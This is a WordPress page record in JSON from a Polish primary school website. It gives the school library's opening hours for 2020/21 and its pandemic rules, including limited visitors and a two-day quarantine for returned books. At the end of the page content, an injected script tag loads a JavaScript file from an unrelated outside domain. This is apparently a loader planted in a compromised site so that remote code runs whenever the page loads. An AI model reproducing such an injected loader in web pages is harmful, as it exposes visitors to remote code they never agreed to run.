{"id":50,"date":"2015-12-15T13:41:17","date_gmt":"2015-12-15T12:41:17","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=50"},"modified":"2020-09-23T06:02:20","modified_gmt":"2020-09-23T04:02:20","slug":"godziny-otwarcia-biblioteki","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/godziny-otwarcia-biblioteki\/","title":{"rendered":"Godziny otwarcia Biblioteki"},"content":{"rendered":"<h2 style=\"text-align: center;\">Godziny otwarcia biblioteki<\/h2>\n<h2 style=\"text-align: center;\">Rok szkolny 2020\/21<\/h2>\n<p><strong>\u00a0<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>poniedzia\u0142ek: <\/strong>13:00-14:30<\/p>\n<p style=\"text-align: center;\"><strong>wtorek:\u00a0<\/strong>7:30 &#8211; 8:00, 9:00 &#8211; 9:30, 13:00 &#8211; 14:00<\/p>\n<p style=\"text-align: center;\"><strong>\u015broda:\u00a0<\/strong>13:00 &#8211; 14:30<\/p>\n<p style=\"text-align: center;\"><strong>czwartek:\u00a0<\/strong>12:00 &#8211; 14:00<\/p>\n<p style=\"text-align: center;\"><strong>pi\u0105tek:\u00a0<\/strong>13:00 &#8211; 14:00<\/p>\n<h4><span style=\"font-size: 20.0pt; line-height: 115%; font-family: 'Arial\\, Helvetica\\, sans-serif';\">Czytelnicy<\/span> <span style=\"font-size: 20.0pt; line-height: 115%; font-family: 'Arial\\, Helvetica\\, sans-serif';\">z<\/span><span style=\"font-size: 20.0pt; line-height: 115%; font-family: 'Arial\\, Helvetica\\, sans-serif';\"> zasob\u00f3w biblioteki b\u0119d\u0105 mogli korzysta\u0107 w wyznaczonych godzinach.\u00a0<\/span><span style=\"font-size: 20.0pt; line-height: 115%; font-family: 'Arial\\, Helvetica\\, sans-serif';\">Nie ma wolnego dost\u0119pu do p\u00f3\u0142ek \u2013 ksi\u0105\u017cki kompletuje bibliotekarz.<\/span><span style=\"font-size: 20.0pt; line-height: 115%; font-family: 'Arial\\, Helvetica\\, sans-serif';\">\u00a0Jednocze\u015bnie w bibliotece mog\u0105 przebywa\u0107 cztery osoby.<\/span><\/p>\n<p>Ksi\u0105\u017cki, kt\u00f3re zostan\u0105 zwr\u00f3cone do biblioteki zostan\u0105 skierowane na tzw. 2-dniow\u0105 kwarantann\u0119 (wydzielone zosta\u0142o pud\u0142o do kt\u00f3rego nale\u017cy w\u0142o\u017cy\u0107 ksi\u0105\u017ck\u0119 z karteczk\u0105 na kt\u00f3rej znajd\u0105 si\u0119 informacje z imieniem i nazwiskiem czytelnika oraz dat\u0105 zwrotu) i dopiero po tym czasie b\u0119d\u0105 mog\u0142y zosta\u0107 ponownie wypo\u017cyczone.<\/h4>\n<h3><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><\/h3>\n<h3><strong><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/godziny-otwarcia-biblioteki\/biblioteka\/\" rel=\"attachment wp-att-5518\"><img loading=\"lazy\" class=\"aligncenter wp-image-5518\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/biblioteka.jpg\" alt=\"biblioteka\" width=\"366\" height=\"387\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/biblioteka.jpg 606w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/biblioteka-284x300.jpg 284w\" sizes=\"(max-width: 366px) 100vw, 366px\" \/><\/a>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong><\/h3>\n<h3 style=\"text-align: center;\"><\/h3>\n<h3><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/h3>\n","protected":false},"excerpt":{"rendered":"<p>Godziny otwarcia biblioteki Rok szkolny 2020\/21 \u00a0 poniedzia\u0142ek: 13:00-14:30 wtorek:\u00a07:30 &#8211; 8:00, 9:00 &#8211; 9:30, 13:00 &#8211; 14:00 \u015broda:\u00a013:00 &#8211; 14:30 czwartek:\u00a012:00 &#8211; 14:00 pi\u0105tek:\u00a013:00 &#8211; 14:00 Czytelnicy z zasob\u00f3w biblioteki b\u0119d\u0105 mogli korzysta\u0107 w wyznaczonych godzinach.\u00a0Nie ma wolnego dost\u0119pu do p\u00f3\u0142ek \u2013 ksi\u0105\u017cki kompletuje bibliotekarz.\u00a0Jednocze\u015bnie w bibliotece mog\u0105 przebywa\u0107 cztery osoby. Ksi\u0105\u017cki, kt\u00f3re zostan\u0105 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/50"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=50"}],"version-history":[{"count":13,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/50\/revisions"}],"predecessor-version":[{"id":15693,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/50\/revisions\/15693"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=50"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}